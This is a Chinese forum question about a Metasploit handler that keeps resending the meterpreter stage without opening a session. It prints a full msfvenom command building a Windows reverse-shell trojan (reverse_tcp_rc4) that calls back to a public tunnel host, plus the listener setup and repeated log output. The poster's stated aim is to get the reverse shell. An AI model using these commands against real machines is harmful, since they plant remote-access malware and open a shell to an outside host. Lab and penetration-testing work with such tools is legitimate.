msf使用windows/meterpreter/reverse_tcp_rc4时stage包不断发送

问题遇到的现象和发生背景

使用msf payloads模块windows/meterpreter/reverse_tcp_rc4生成木马后在靶机上运行 不停出现Sending stage (175178 bytes) to 192.168.58.1

问题相关代码,请勿粘贴截图

msf6 > msfvenom -p windows/meterpreter/reverse_tcp_rc4 lhost=server.natappfree.cc lport=40935 RC4PASSWORD=opgg -f exe -o /home/kali/wuwu.exe
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp_rc4 lhost=server.natappfree.cc lport=40935 RC4PASSWORD=opgg -f exe -o /home/kali/wuwu.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 471 bytes
Final size of exe file: 73802 bytes
Saved as: /home/kali/wuwu.exe
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.58.128
lhost => 192.168.58.128
msf6 exploit(multi/handler) > set lport 80
lport => 80
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp_rc4
payload => windows/meterpreter/reverse_tcp_rc4
msf6 exploit(multi/handler) > set RC4PASSWORD opgg
RC4PASSWORD => opgg
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

Name Current Setting Required Description


Payload options (windows/meterpreter/reverse_tcp_rc4):

Name Current Setting Required Description


EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process,
none)
LHOST 192.168.58.128 yes The listen address (an interface may be specified)
LPORT 80 yes The listen port
RC4PASSWORD opgg yes Password to derive RC4 key from

Exploit target:

Id Name


0 Wildcard Target

运行结果及报错内容

msf6 exploit(multi/handler) > exploit
[] Started reverse TCP handler on 192.168.58.128:80
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[] Sending stage (175178 bytes) to 192.168.58.1
[
] Sending stage (175178 bytes) to 192.168.58.1
[*] Sending stage (175178 bytes) to 192.168.58.1

我的解答思路和尝试

怀疑可能是shell反弹后无法解析

我想要达到的结果

成功获取反弹的shell

....问题和题主相同,请问解决了吗